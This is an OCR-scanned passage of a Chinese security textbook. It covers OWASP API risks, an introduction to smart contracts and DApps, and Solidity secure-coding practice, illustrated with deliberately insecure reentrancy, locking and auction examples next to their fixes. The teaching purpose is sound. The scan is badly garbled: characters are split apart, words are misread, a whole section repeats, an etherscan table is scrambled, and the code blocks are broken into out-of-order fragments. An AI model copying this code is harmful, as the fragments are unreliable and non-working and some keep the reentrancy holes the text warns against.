1. 容 易 受 到 攻击 吗 


测试 API 漏 洞 应 该 类 似 于 测试 其 他 应 用 程序 的 漏洞 。 所 有 不 同类 型 的 注入 、 认 证 、 访 问 控制 、 加 密 、 配 置 和 其 他 问题 ， 可 以 在 传统 应 用 程序 中 出 现 的 也 存在 于 API 中 。 然 而 ， 由 于 API 由 程序 (而 不 是 
人 类 ) 使 用 ， 所 以 经 常 缺 少 U1， 并 且 还 使 用 复杂 的 协议 和 复杂 的 数据 结构 。 这 些 因 素 使 得 安全 测试 变 得 十 分 困难 。 一 些 广泛 使 用 的 格式 可 以 提供 帮助 ， 例 如 Swagger (OpenAPl) 、JSON 和 XML。 一 些 
框架 ,如 GWT 和 一 些 RPC 实 现 了 使 用 自 定 义 格 式 。 一 些 应 用 程序 和 API 创 建 了 自己 的 协议 和 数据 格式 ， 如 WebSockets。API 的 广泛 性 和 复杂 性 使 得 难以 进行 有 效 的 自动 化 安全 测试 ， 这 可 能 导致 虚假 的 安 
全 感 。 最 终 ， 确 认 API 是 否 安全 意味 着 需要 仔细 选择 一 种 攻击 策略 来 测试 所 有 重要 的 防御 。 


2. 如 何 防止 
保护 API 的 关键 在 于 确保 充分 了 解 威胁 模型 以 及 防御 方式 。 
1) 确保 已 经 保护 客户 端 和 APlI 之 间 的 通信 。 
2) 确保 APl 具 有 强大 的 身份 验证 方案 ， 并 且 所 有 凭据 、 密 钥 和 令 牌 已 被 保护 。 
3) 确保 请 求 使 用 的 任何 数据 格式 ， 解 析 器 都 被 配置 并 强化 到 可 以 防止 此 类 攻击 。 
4) 实现 访问 控制 方案 ,保护 API 不 被 不 正确 地 调用 ， 包 括 未 经 授权 的 功能 和 数据 引用 。 
5) 防止 所 有 形式 的 注入 ， 即 便 它 们 适用 于 普通 应 用 ， 但 是 这 些 攻击 对 API 同 样 可 行 。 


6) 区 块 链 的 项 目 大 部 分 支持 Rest API， 防 止 API 的 不 合理 调用 ， 建 立 API 调 用 的 访问 控制 和 加 密 是 一 种 有 效 的 方法 。 
3. 攻 击 案例 


案例 #1: 想象 一 下 ， 一 个 移动 端 银 行 应 用 程序 连接 到 银行 的 XML AP1， 用 于 获取 账户 信息 和 执行 交易 。 攻 击 者 对 应 用 程序 进行 逆向 操作 ， 从 中 发 现 用 户 账 号 作为 认证 请 求 的 一 部 分 与 用 户 名 和 密码 一 
起 被 传递 到 服务 器 。 攻 击 者 发 送 合法 凭据 ， 但 是 友 送 另 一 个 用 户 的 账号 ， 从 而 获得 对 其 他 用 户 账号 的 完全 访问 权限 。 


案例 #2: 想象 一 下 由 网 络 局 动 公 共 API， 用 于 自动 发 送 短信 。API 接 收 包 含 "tran-sactionid "字段 的 JSON 消 息 ， 将 此 "transactionid " 值 解析 为 字符 串 ， 并 将 其 连接 到 SQL 查询 中 ， 而 不 需要 转 义 或 参数 
化 它 。 可 以 看 到 API 与 任何 其 他 类 型 的 应 用 程序 一 样 容易 受到 SQL 注 入 。 在 任何 一 种 情况 下 ， 供 应 商 可 能 不 提供 使 用 这 些 服务 的 Web Ul， 从 而 使 安全 测试 更 加 困难 。 


以 上 描述 了 区 块 链 Web 或 者 移动 端 开 发 所 需要 注意 的 OWAPS Top 10。 由 于 区 块 链 技术 的 特殊 性 ， 仅 仅 关 注 和 避免 OWPAs Top10 的 漏洞 是 不 够 的 。 下 面 介绍 其 他 必需 的 安全 控制 。 


3.2 ”智能 合约 的 安全 


3.2.1 智能 合约 简介 


1. 智 能 合约 的 概念 


智能 合约 是 20 世 纪 90 年 代 由 尼克 -萨博 提出 的 一 个 概念 ， 几 乎 与 互联 网 同龄 。 由 于 缺少 可 信 的 执行 环境 ， 智 能 合约 并 没有 被 应 用 到 实际 产业 中 。 自 比特 币 诞 生 后 ， 人 们 逐渐 认识 到 比特 币 的 底层 技术 
一 一 区 块 链 天 生 可 以 为 智能 合约 提供 可 信 的 执行 环境 。 以 太 坊 首 先 看 到 了 区 块 链 和 智能 合约 的 契合 ， 发 布 了 白皮书 《以 太 坊 : 下 一 代 智能 合约 和 去 中 心 化 应 用 平台 》， 并 且 开 发 实现 了 以 太 坊 公有 链 。 简 
单 地 说 ， 智 能 合约 是 代码 和 数据 的 集合 ， 寄 存 于 区 块 链 的 具体 地 址 。 智 能 合约 就 好 像 是 区 块 链 中 一 个 自动 化 的 代理 (或 者 说 是 机 器 人 ) ， 它 有 自己 的 账户 ， 在 时 间或 事件 的 驱动 下 能 自动 执行 一 些 功能 ， 
如 可 以 在 智能 合约 之 间 传 递 信息 、 修 改 区 块 链 的 状态 (账户 信息 等 ) ， 以 及 图 灵 完备 计算 []。 以 太 坊 的 智能 合约 是 以 太 坊 特定 的 字 节 码 ， 称 之 为 EVM 字 节 码 。 


智能 合约 程序 不 只 是 一 个 可 以 自动 执行 的 计算 机 程序 ， 它 自己 就 是 一 个 系统 参与 者 。 它 对 接收 到 的 信息 进行 回应 ， 可 以 接收 (通过 Transactions 或 者 Events) 和 储存 价值 (State) ， 也 可 以 向 外 发送 
信息 和 价值 。 这 个 程序 就 像 一 个 可 以 被 信任 的 人 ， 可 以 临时 或 者 长 期 保管 资产 ， 并 且 按 照 事 先 的 规则 自动 执行 操作 。 


不 同 的 区 块 链 项 目 使 用 不 同 的 程序 语言 作为 智能 合约 的 编程 语言 。 例 如 ，HyperLedger Fabric 使 用 Java、Go 开 发 ChainCode ( 链 码 ，Fabric 的 智能 合约 ) ，R3 的 Corda 使 用 Java， 而 以 太 坊 使 用 以 
下 语言 (其 中 Solidity 应 用 非常 普遍 ， 本 书 主要 以 Solidity 为 例 ) 。 


. Solidity: 类 JavaSctipt。 这 是 以 太 坊 推荐 的 旗舰 语言 ， 也 是 最 流行 的 智能 合约 语言 。 具 体 用 法 可 以 参考 Solidity 文 档 。 
Serpent: 类 Python。 
. LLL: 类 Lisp。 

2. 智 能 合约 与 DApp 的 关系 与 区 别 


以 太 坊 社 区 把 基于 智能 合约 的 应 用 称 为 去 中 心 化 的 应 用 程序 (Decentralized App， 简 称 DApp) 。DApp 的 目标 是 (或 者 应 该 是 ) 让 智能 合约 有 一 个 友好 的 界面 ， 外 加 一 些 额外 的 东西 ， 例 如 
IPFS (可 以 存储 和 读 取 数 据 的 去 中 心 化 网 络 ， 不 是 出 自 以 太 坊 团队 ， 但 有 类 似 的 精神 ) 。DApp 可 以 在 一 台 与 以 太 坊 节点 交互 的 中 心 化 服务 器 上 运行 ， 也 可 以 在 任意 一 个 以 太 坊 平 等 节点 上 运行 。 





i 与 一 般 的 网 站 不 同 ，DApp 不 能 在 普通 的 服务 器 上 运行 。 它 需要 提交 交易 到 区 块 链 并 且 从 区 块 链 而 不 是 中 心 化 数据 库 读 取 重要 数据 。 相 对 于 典型 的 用 户 登 录 有 系统 ， 用 户 有 可 能 被 表示 成 一 
个 “钱包 ”地 址 而 其 他 用 户 数据 保存 在 本 地 。 许 多 事情 都 会 与 目前 的 Web 应 用 有 着 不 同 的 架构 。 


DApp 流 程 如 下 。 
1) 用 solidity (或 其 他 语言 ) 编写 智能 合约 (后缀 为 .sol) 。 
2) 用 solc 编 译 器 将 .sol 合 约 编译 成 EVM 字 节 码 。 


3) 编译 好 的 字 节 码 回 送 给 DApp 前 端 。 


4) 前 端 将 编译 好 的 智能 合约 部 署 到 区 块 链 中 。 
5) 区 块 链 返回 智能 合约 地 址 +ABI (合约 接口 的 二 进 制 表示 。 合 约 接口 用 JSON 表 示 ， 包 括 变 量 、 事 件 和 可 以 调用 的 方法 ) 。 
6) 前 端 通过 Address+ABI+ nonce， 调 用 智能 合约 。 


7) 智能 合约 开始 处 理 。 


智能 合约 技术 的 产生 对 互联 网 变革 非常 重要 ， 但 是 不 能 直接 用 于 支撑 DApp 应 用 生态 环境 。 侧 链 、VM 也 撑 不 起 应 用 生态 ， 因 为 我 们 知道 应 用 运行 于 OS 之 上 ， 而 不 是 直接 运行 在 裸 机 之 上 。 一 定 程度 上 
讲 ，VM、 侧 链 可 以 类 比 图 灵 等 价 的 裸 机 。 


Elastos Carrier 作 为 去 中 心 化 的 互联 网 支撑 平台 ， 需 要 Elastos Chain 区 块 链 的 可 信和 服务 以 及 Elastos Runtime 虚 拟 运 行 环境 来 承载 DApp 应 用 。Elastos Chain 并 不 直接 暴露 给 DApp 开 发 SDK。 也 就 是 
说 ， 对 于 Serverless App 或 说 Decentrallized App， 除 了 用 户 ID、 微 网 站 (没有 互联 网 固定 ID 地 址 的 网 站 ) ID、 数 字 资 产 (游戏 、 应 用 、 多 媒体 内 容 等 ) ID 不 能 作假 ， 点 对 点 可 以 交易 之 外 ，DApp 根 本 
看 不 到 什么 是 智能 合约 技术 。 
3. 智 能 合约 的 局 限 性 


对 于 没有 编程 知识 的 人 来 说 ， 他 们 无 法 访问 智能 合约 。 在 他 们 的 眼中 ， 智 能 合约 只 是 一 个 概念 。 由 于 大 部 分 人 都 不 是 程序 员 ， 所 以 这 使 得 其 在 大 众 看 来 可 行 性 不 高 。 由 于 需要 将 条 款 直 接 编 入 代码 ， 
所 以 想 要 使 用 智能 合约 就 必须 具备 编程 知识 。 这 就 需要 具有 专业 知识 的 人 员 对 合同 进行 修改 和 更 新 。 智 能 合约 也 许 能 减轻 对 律师 的 依赖 ， 但 是 相对 的 需要 程序 员 参 与 。 而 包括 程序 员 在 内 的 第 三 方 人 员 的 
参与 ， 却 是 智能 合约 想 要 减少 的 。 虽 然 智 能 合约 具有 十 足 的 潜力 ， 但 是 不 幸 的 是 ， 由 于 这 个 障碍 的 存在 使 得 其 还 无 法 成 为 主流 的 解决 方案 。 

4. 智 能 合约 与 Oracle 的 关系 


一 些 开发 者 已 经 着手 解 决 智能 合约 技术 的 大 众 化 。 其 中 一 个 平台 就 是 Oracle， 它 是 一 个 可 视 化 智能 合约 编辑 器 ， 专 门 为 不 具备 编码 能 力 的 日 常用 户 开 发 ， 其 目的 是 为 了 消除 专业 程序 员 和 日 益 增 加 的 
潜在 用 户 之 间 的 区 块 链 专业 知识 差距 。 该 平台 的 界面 简洁 、 易 用 ， 简 化 了 流程 ， 为 用 户 节 省 了 大 部 分 使 用 智能 合约 的 费用 ,减少 了 相关 第 三 方 的 参与 。 


[1] 可 以 用 图 灵机 做 到 的 所 有 事情 ， 通 俗 地 说 就 是 一 般 编程 语言 可 以 做 的 所 有 事情 。 


3.2 ”智能 合约 的 安全 


1. 智 能 合约 的 概念 


智能 合约 是 20 世 纪 90 年 代 由 尼克 .萨博 提出 的 一 个 概念 ， 几 乎 与 互联 网 同龄 。 由 于 缺少 可 信 的 执行 环境 ， 智 能 合约 并 没有 被 应 用 到 实际 产业 中 。 自 比特 币 诞生 后 ， 人 们 逐渐 认识 到 比特 币 的 底层 技术 
一 一 区 块 链 天 生 可 以 为 智能 合约 提供 可 信 的 执行 环境 。 以 太 坊 首先 看 到 了 区 块 链 和 智能 合约 的 契合 ， 发 布 了 白皮书 《以 太 坊 : 下 一 代 智 能 合约 和 去 中 心 化 应 用 平台 》， 并 且 开 发 实现 了 以 太 坊 公有 链 。 简 
单 地 说 ， 智 能 合约 是 代码 和 数据 的 集合 ， 寡 人 存 于 区 块 链 的 具体 地 址 。 智 能 合约 就 好 像 是 区 块 链 中 一 个 自动 化 的 代理 (或 者 说 是 机 器 人 ) ， 它 有 自己 的 账户 ， 在 时 间或 事件 的 驱动 下 能 自动 执行 一 些 功 能 ， 
如 可 以 在 智能 合约 之 间 传 递 信息 、 修 改 区 块 链 的 状态 (账户 信息 等 ) ， 以 及 图 灵 完 备 计 算 由 。 以 太 坊 的 智能 合约 是 以 太 坊 特定 的 字 节 码 ， 称 之 为 EVM 字 节 码 。 

智能 合约 程序 不 只 是 一 个 可 以 自动 执行 的 计算 机 程序 ， 它 自己 就 是 一 个 系统 参与 者 。 它 对 接收 到 的 信息 进行 回应 ， 可 以 接收 (通过 Transactions 或 者 Events) 和 储存 价值 (State) ， 也 可 以 向 外 发 送 
信息 和 价值 。 这 个 程序 就 像 一 个 可 以 被 信任 的 人 ， 可 以 临时 或 者 长 期 保管 资产 ， 并 且 按 照 事 先 的 规则 自动 执行 操作 。 

不 同 的 区 块 链 项 目 使 用 不 同 的 程序 语言 作为 智能 合约 的 编程 语言 。 例 如 ，HyperLedger Fabric 使 用 Java、Go 开 发 ChainCode ( 链 码 ，Fabric 的 智能 合约 ) ，R3 的 Corda 使 用 Java， 而 以 太 坊 使 用 以 
下 语言 (其 中 Solidity 应 用 非常 普遍 ， 本 书 主要 以 Solidity 为 例 ) 。 


. Solidity: 类 JavaSctipt。 这 是 以 太 坊 推荐 的 旗舰 语言 ， 也 是 最 流行 的 智能 合约 语言 。 具 体 用 法 可 以 参考 Solidity 文 档 。 


Serpent: 类 Python。 
. LLL: 类 Lisp。 
2. 智 能 合约 与 DApp 的 关系 与 区 别 


以 太 坊 社 区 把 基于 智能 合约 的 应 用 称 为 去 中 心 化 的 应 用 程序 (Decentralized App， 简 称 DApp) 。DApp 的 目标 是 (或 者 应 该 是 ) 让 智能 合约 有 一 个 友好 的 界面 ， 外 加 一 些 额外 的 东西 ， 例 如 
IPFS (可 以 存储 和 读 取 数 据 的 去 中 心 化 网 络 ， 不 是 出 自 以 太 坊 团队 ， 但 有 类 似 的 精神 ) 。DApp 可 以 在 一 台 与 以 太 坊 节点 交互 的 中 心 化 服务 器 上 运行 ， 也 可 以 在 任意 一 个 以 太 坊 平 等 节点 上 运行 。 


ja 与 一 般 的 网 站 不 同 ，DApp 不 能 在 普通 的 服务 器 上 运行 。 它 需要 提交 交易 到 区 块 链 并 且 从 区 块 链 而 不 是 中 心 化 数据 库 读 取 重要 数据 。 相 对 于 典型 的 用 户 登 录 有 系统， 用 户 有 可 能 被 表示 成 一 
个 “钱包 ”地 址 而 其 他 用 户 数据 保存 在 本 地 。 许 多 事情 都 会 与 目前 的 Web 应 用 有 着 不 同 的 架构 。 





DApp 流 程 如 下 。 

1) 用 solidity (或 其 他 语言 ) 编写 智能 合约 (后缀 为 .sol) 。 
2) 用 solc 编 译 器 将 .sol 合 约 编译 成 EVM 字 节 码 。 

3) 编译 好 的 字 节 码 回 送 给 DApp 前 端 。 


4) 前 端 将 编译 好 的 智能 合约 部 署 到 区 块 链 中 。 


— 


5) 区 块 链 返 回 智能 合约 地 址 +ABI (合约 接口 的 二 进 制 表示 。 合 约 接口 用 JSON 表 示 ， 包 括 变量 、 事 件 和 可 以 调用 的 方法 ) 。 


— 


6) 前 端 通过 Address+ABI+nonce， 调 用 智能 合约 。 


— 


7) 智能 合约 开始 处 理 。 


智能 合约 技术 的 产生 对 互联 网 变革 非常 重要 ， 但 是 不 能 直接 用 于 支撑 DApp 应 用 生态 环境 。 侧 链 、VM 也 撑 不 起 应 用 生态 ， 因 为 我 们 知道 应 用 运行 于 OS 之 上 ， 而 不 是 直接 运行 在 裸 机 之 上 。 一 定 程度 上 
讲 ，VM、 侧 链 可 以 类 比 图 灵 等 价 的 裸 机 。 


Elastos Carrier 作 为 去 中 心 化 的 互联 网 支撑 平台 ， 需 要 Elastos Chain 区 块 链 的 可 信和 服务 以 及 Elastos Runtime 虚 拟 运 行 环境 来 承载 DApp 应 用 。Elastos Chain 并 不 直接 暴露 给 DApp 开 发 SDK。 也 就 是 
说 ， 对 于 Serverless App 或 说 Decentrallized App， 除 了 用 户 ID、 微 网 站 (没有 互联 网 固定 ID 地 址 的 网 站 ) ID、 数 字 资 产 (游戏 、 应 用 、 多 媒体 内 容 等 ) ID 不 能 作假 ， 点 对 点 可 以 交易 之 外 ，DApp 根 本 
看 不 到 什么 是 智能 合约 技术 。 


3. 智 能 合约 的 局 限 性 


对 于 没有 编程 知识 的 人 来 说 ， 他 们 无 法 访问 智能 合约 。 在 他 们 的 眼中 ， 智 能 合约 只 是 一 个 概念 。 由 于 大 部 分 人 都 不 是 程序 员 ， 所 以 这 使 得 其 在 大 众 看 来 可 行 性 不 高 。 由 于 需要 将 条 款 直接 编 入 代码 ， 
所 以 想 要 使 用 智能 合约 就 必须 具备 编程 知识 。 这 就 需要 具有 专业 知识 的 人 员 对 合同 进行 修改 和 更 新 。 智 能 合约 也 许 能 减轻 对 律师 的 依赖 ， 但 是 相对 的 需要 程序 员 参 与 。 而 包括 程序 员 在 内 的 第 三 方 人 员 的 
参与 ， 却 是 智能 合约 想 要 减少 的 。 昌 然 智 能 合约 具有 十 足 的 潜力 ， 但 是 不 笠 的 是 ， 由 于 这 个 障碍 的 存在 使 得 其 还 无 法 成 为 主流 的 解决 方案 。 


4. 智 能 合约 与 Oracle 的 关系 


一 些 开发 者 已 经 着手 解 决 智能 合约 技术 的 大 众 化 。 其 中 一 个 平台 就 是 Oracle， 它 是 一 个 可 视 化 智能 合约 编辑 器 ， 专 门 为 不 具备 编码 能 力 的 日 常用 户 开 发 ， 其 目的 是 为 了 消除 专业 程序 员 和 日 益 增 加 的 
潜在 用 户 之 间 的 区 块 链 专业 知识 差距 。 该 平台 的 界面 简洁 、 易 用 ， 简 化 了 流程 ， 为 用 户 节省 了 大 部 分 使 用 智能 合约 的 费用 ， 减 少 了 相关 第 三 方 的 参与 。 


[1] 可 以 用 图 灵机 做 到 的 所 有 事情 ， 通 俗 地 说 就 是 一 般 编程 语言 可 以 做 的 所 有 事情 。 


3.2.2 ”智能 合约 安全 编码 的 最 佳 实践 


1. 智 能 合约 编程 与 传统 编程 的 区 别 
智能 合约 编程 与 传统 的 编程 在 信息 和 资金 安全 方面 存在 如 下 一 些 不 同 。 
1) 智能 合约 本 身 可 以 存储 几 和 干 万 甚至 几 个 亿美 金 的 资产 。 


2) 智能 合约 在 链 上 面 的 部 署 是 通过 共识 的 ,一 旦 部 署 成 功 就 不 能 修改 。 因 此 ， 即 使 已 经 发 现 有 安全 漏洞 ， 也 不 能 用 传统 的 方法 进行 打 补 丁 或 者 升级 。 必 须 在 智能 合约 设计 和 编码 过 程 中 把 容错 和 异常 
终止 逻辑 写 进 智能 合约 里 面 。 


3) 公有 链 上 的 智能 合约 对 大 家 都 是 公开 的 ， 一 般 没有 传统 的 加 密 、 审 计 和 访问 控制 。 
4) 目前 智能 合约 的 开发 还 处 于 初级 阶段 ， 编 程 模式 和 传统 的 SDLC (Software Deve-lopment Life Cycel， 软 件 开发 生命 周期 ) 需要 进行 有 效 的 改造 来 适应 智能 合约 的 安全 需求 。 


因此 ， 仪 仪 抵御 OWAsP 已 知 的 漏洞 (OWASP Top 10) 是 不 够 的 ， 我 们 需要 学 习 新 的 安全 编程 模式 。 同 时 我 们 必须 认识 到 ， 随 着 安全 环境 的 不 断 变 化 ， 智 能 合约 肯定 会 有 新 的 错误 和 安全 风险 ， 最 
佳 安 全 实践 肯定 会 被 不 断 地 更 新 和 加 强 。 我 们 预计 以 后 会 诞生 一 批 在 智能 合约 安全 方面 具有 专业 知识 和 经 验 的 公司 来 帮助 区 块 链 项 目的 安全 落地 。 图 3-1 所 示 是 网 站 etherscan.io 智 能 合约 账号 和 对 应 的 以 
太 数 量 的 列表 ， 可 以 看 出 这 些 智 能 合约 包含 巨额 的 资金 。 因 为 智能 合约 代码 是 明码 分 布 企 区 块 链 上 面 ， 黑 客 可 以 每 时 每 刻 地 研究 安全 漏洞 。 一 旦 发 现 ， 就 可 能 把 合约 里 面 的 部 分 甚 全 所 有 资金 偷 走 。 


Contract Accounts 


Atotal Of 1131984 contracts found (~ 11,555,770.067 Ether) 
Displaying the last 10000 records only 


Rank 


Address 


国 0xab7c74abc0c4d48d1bdad5dcb26153fc8780f83e 


Balance 


1,500,000.00134197094280789 Ether 


Home / Accour 





E Ba Paoet oe00 





Percentage 


12.98052828% 


| Next || Las 


TxCount 


198 





国 0xde0b295669a9fd93d5f28d9ec85e40f4cb697bae (EthDev) 
国 0x07ee55aa48bb72dcc6e9d78256648910de513eca 


国 0xf1ce0a98efbfa3f8ebec2399847b7d88294a634e 





国 0x61edcdf5bb737adffe5043706e7c5bb1f1a56eea 


国 0xf0160428a8552ac9bb7e050d90eeade4ddd52843 (DigixCrowdSale) 


742,021.455382925139479303 Ether 
728,024.76440062714 Ether 


550,000.02 Ether 





485,000 Ether 


466,648.059532885422905454 Ether 


6.42122032% 


6.30009736% 


4.75952720% 





4.19703747% 


4.03822555% 





2. 外 部 调用 


国 0x3cfc056462a06d3d146a2c6e73e5a48ea3798f24 

国 0x900d0881a2e85a8e4076412ad1cefbe2d39c566c 

国 0x7da82c7yab4771ff031b66538d2fb9b0b047f6cf9 (GolemMultisig) 
国 0xb62ef4c58f3997424b0cceab28811633201706bc 


四 0xa646e29877d52b9e2de457eca09c724ff16d0a2b 


国 0xcafe1a77e84698c83ca8931f54a755176ef75f2c (Aragon Multisig) 


国 0xbf4ed7b27f1d666546e30d74d50d173d20bca754 (WithdrawDAO) 


图 3-1 etherscan.io 智 能 


455,230.01577393 Ether 

450,000.05 Ether 
386,023.140999999999999999 Ether 
347,213.828255927752964362 Ether 
299,902.24 Ether 
268.444.997539575201 822239 Ether 


243,981.801356154168551277 Ether 


合约 账号 和 对 应 的 以 太 数量 的 列表 


3.93941739% 


3.89415891% 


3.34052286% 


3.00467927% 


2.59525967% 


2.32303859% 


2.11134178% 





对 不 可 信 合 约 的 调用 可 能 会 引发 一 些 意外 的 风险 或 错误 ， 外 部 调用 可 能 会 在 该 合约 或 其 所 依赖 的 任何 其 他 合约 中 执行 恶意 代码 ， 因 此 应 尽 可 能 避免 外 部 调用 。 每 个 外 部 调用 都 应 被 视 为 潜在 的 安全 风 


险 ， 如 果 可 能 ， 应 将 其 删除 。 当 无 法 删除 外 部 调用 时 ， 可 按照 本 节 其 余音 


我 们 来 看 看 下 面 的 不 安全 的 外 部 函数 调用 的 例子 。 


// 调 月 
mapping 
function wi 

















日 外 部 函数 amountToWithdraw 完 成 统计 
(address => uint) private userBalances; 














{ 


上 面 的 函数 withdrawBalance 调 用 外 部 函数 amountToWithdraw，amountToWithdraw 函 数 可 能 


二 次 以 后 ) 的 调用 仍然 会 成 功 ， 并 且 将 一 次 又 一 次 地 提取 余额 。 这 就 可 以 造成 类 似 The DAO 一 样 的 攻击 。 黑 客 可 以 利用 这 个 漏洞 递归 地 把 所 有 资金 转 走 。 


在 给 出 的 示例 中 ， 避 免 问题 的 最 佳 方法 是 使 用 send0 而 不 是 call.value00。 


thdrawBalance() public 





uint amountTowWithdraw = userBalances [msg.sengder]; 


// 此 时 ， 调 用 方 的 代码 已 经 被 执行 ， 并 且 可 以 再 次 调用 withdrawBalance 











If (! (msg.sender.call.value (amountToWithdraw) ())) 


{ throw; } 
userBalances[msg.sender] = 0; 





保 不 调用 外 部 函数 。 


mapping 








(address => uint) private userBalances; 
function withdrawBalance() public 








{ 





uint amountToWithdraw = Ce sender]; 
userBalances [msg.sender|] = 


// 用 户 的 余额 已 经 被 设置 为 0， 所 以 未来 的 调用 不 会 转 走 任 何 资金 

















If (! (msg.sender.call.value (amountToWithdraw) ())) { throw; } 


分 中 的 建议 来 尽量 减少 危险 。 


过 来 调用 withdrawBalance。 由 于 用 户 的 余额 在 功能 结束 之 前 尚未 设置 为 0， 所 以 第 二 次 (及 第 


这 将 防止 任何 外 部 代码 被 执行 。 但 是 ， 如 果 无 法 删除 外 部 调用 ， 则 防止 此 次 攻击 的 最 简单 方法 是 在 完成 所 需 内 部 工作 之 前 确 





3. 外 部 函数 调用 需要 解决 的 竞争 条 件 


由 于 竞争 条 件 可 能 发 生 在 多 个 了 为数， 甚至 多 个 合约 中 ， 任 何 旨 在 防止 类 似 The DAO 重 入 攻击 的 解决 方案 都 是 不 够 的 。 相 反 ， 我 们 建议 先 完成 函数 内 部 所 有 工作 ， 然 后 才 调 用 外 部 函数 。 针 对 这 个 规 


则 ， 如 果 仔 细 跟 踪 将 允许 我 们 避免 竞争 条 件 。 


// 


mapping 
mapping 











NSECURE 











U 

mapping (address => uint) private userBalances; 
( 
( 








address => bool) private claimedBonus; 
address => uint) private rewardsForA; 
function withdraw (address recipient) public 

















{ 


} 





{ 


// 此 函数 调用 外 部 函数 








uint amountToWithdraw = userBalances[recipient]; 





rewardsForA[recipient] = 0; 





If (! (recipient.call.value (amountToWithdraw) () ) ) 





{ throw; } // external function 











function getFirstWithdrawalBonus (address recipient) public 





If (claimedBonus[recipient]) { throw; } 





// 每 个 获奖 人 只 应 能 够 获得 一 次 奖金 


rewardsForA[recipient] += 100; 





withdraw (recipient); 





// 该 函数 调用 外 部 函数 ， 外 部 函数 再 调用 其 他 外 部 函数 


claimedi 





Bonus [recipient] = true; 





但 是 ， 我 们 不 仅 要 避免 太 早 调用 外 部 函数 (在 没有 完成 函数 内 部 工作 之 前 ) ， 


还 要 避免 调用 “调用 外 部 函数 ”的 函数 。 例 如 ， 以 下 是 不 安全 的 。 





即使 getFirstWithdrawalBonus( 不 直接 调用 外 部 合约 ， 在 withdraw(0 中 的 调用 也 足以 使 其 容易 受到 竞争 条 件 的 影响 。 因 此 ， 需 要 对 withdraw() 进 行 处 理 ， 就 好 像 它 也 是 不 受信 任 的 。 





mapping (address => uint) private userBalances; 
mapping (address => bool) private claimedBonus; 
mapping (address => uint) private rewardsForA; 
function untrustedWithdraw (address recipient) public 


{ 




















uint amountToWithdraw = userBalances[recipient]; 








rewardsForA[recipient] = 0; 
If (!(recipient.call.value (amountTowithdraw) () ) ) 
{ throw; } 


} 
function untrustedGetrFirstWithdrawalBonus (address recipient) public 


{ 

















if Un { throw; } 
// 每 个 获奖 人 只 应 获得 奖金 一 次 
claimedBonus [recipient] = ne 
rewardsForA[recipient] += 100 

// 已 经 设 定 为 真 ， 所 以 再 入 攻击 是 不 可 能 


untrustedWithdraw (recipient); 



































在 上 面 的 例子 中 ， 我 们 除了 修复 不 可 能 重 入 ， 也 把 函数 不 可 信任 的 调用 做 了 标记 。 对 于 untrustedGetFirstWithdrawalBonus0 调 用 untrustedWithdraw0， 由 于 它 调用 外 部 合约 ， 所 以 必须 将 
untrustedGetFirstWithdrawalBonus0 视 为 不 安全 的 。 


另 一 种 经 常用 到 的 解决 方案 是 使 用 互 奈 (Mutex) 。 这 允许 我 们 “锁定 ”一 些 状态 ， 因 此 只 能 由 锁 的 所 有 者 更 改 。 一 个 简单 的 示例 如 下 。 























// Note: 这 是 一 个 基本 的 例子 ， 对 互 斥 是 特别 有 用 的 ， 一 含 大 量 的 逻辑 和 /或 共享 状态 








mapping (address => uint) private balances; 
bool private lockBalances; 
function deposit() payable public returns (bool) 


{ 









































if (!lockBalances) 
{ 
lockBalances = true; 
balances [msg.sender] += msg.value; 
lockBalances = false; 
return true; 
} throw; 
} 
function withdraw (uint amount) payable public returns (bool) 














{ Le 


If (!lockBalances && amount > 0 && balances[msg.sender] >= amount) 


{ 














lockBalances = true; 





























If (msg.sender.call (amount) ()) 

{ 
// 通常 不 安全 ， 但 互 斥 锁 mutex 的 使 用 使 得 这 个 语句 安全 了 
balances [msg.sender|] -= amount; 

} 

lockBalances = false; 














return true; 


throw; 


如 果 用 户 在 第 一 次 调用 完成 之 前 尝试 再 次 调用 withdraw(， 则 该 锁 将 防止 其 产生 任何 影响 。 这 是 一 种 有 效 的 模式 ， 但 是 如 果 有 多 个 合约 需要 合作 时 ， 则 会 变 得 很 棘手 。 以 下 是 不 安全 的 : 


// 不 安全 的 代码 
contract StateHolder 
{ 
uint private n; 
address private lockHolgder; 
function getLock() 


{ 




















if (lockHolder != 0) { throw; } 
lockHolder = msg.sender; 








} 


function releaseLock () 








lockHolder = 0; 
} 
function set (uint newState) 


{ 











If (msg.sender != lockHolder) { throw; } 
n = newState; 





攻击 者 可 以 调用 getLock() 锁 定 合 约 ， 但 是 不 调用 releaseLock() 来 解除 合约 。 如 果 他 们 这 样 做 ， 那 么 合约 将 永远 被 锁定 ， 也 不 会 有 进一步 的 变化 。 如 果 使 用 互 奈 来 防范 竞争 条 件 ， 则 需要 充分 测试 来 防 
止 死 锁 。 


4 处 理 外 部 调用 错误 


异常 ， 


Solidity 提 供 了 适用 于 原始 地 址 的 低级 调用 方法 : address.call()、address.callcode()、address.delegatecall0 和 address.send。 这 些 低级 方法 永远 遇 到 异常 ， 则 返回 
false。 另 一 方面 ， 合 约 调 用 ee ExternalContract.doSomething()) 将 自动 抛 出 一 个 throw (例如 ， 如 果 doSomething0 抛 出 ， Ce 。 如 果 选 择 使 用 低级 调 
用 方法 ， 则 应 确保 通过 检查 返回 值 来 处 理 调用 失败 的 可 能 性 。 














// 不 好 的 做 法 
SomeAadqdqress .senaq (55) ， 


// 这 代码 有 双重 风险 : 包 会 转发 所 有 剩余 的 Gas; 包 疫 有 检查 代码 运行 的 结果 


someAddress .cal 1 .va ue (55) () ， 




















// 如 果 存 款 操作 deposit， 则 原始 call () 将 只 返回 false， 且 事务 不 会 被 还 原 
someAddress.call.value (100) (bytes4 (sha3 ("deposit ()") ) ) 7 


// 推荐 的 做 法 


f(!someAddress.send (55)) 

































































一 PP- 


// 一 些 故障 代码 
} 


externalContract (someAddress) .deposit.value (100) ， 


5. 外 部 调用 后 不 要 做 控制 流 假设 


尽量 不 要 调用 外 部 合约 ， 如 果 以 太 坊 合约 不 受信 任 ， 那么 恶意 代码 将 被 执行 。 即 使 以 太 坊 合约 不 是 恶意 的 ， 恶 意 代 码 也 可 以 通过 任何 合约 来 执行 。 一 种 特别 危险 的 情况 是 恶意 代码 可 能 拦截 控制 流 ， 


导致 竞争 条 件 。 


// 不 好 的 做 法 
contract auction 
{ 
address highestBidder; 
uint highestBid; 
function bid() payable 
{ 























if (msg.value < highestBid) throw; 
if (highestBigdder != 0) 
{ 

















Es 


F (!highestBidder.send (highestBid)) 


{ 
// 如 果 指 令 错误 则 停止 
throw; 


} 











} 
highest 
highest 
} 


Bidder = msg.sender; 
Bid = msg.value; 








| 


} 
// 比较 安全 的 代码 


contract auction 
{ 
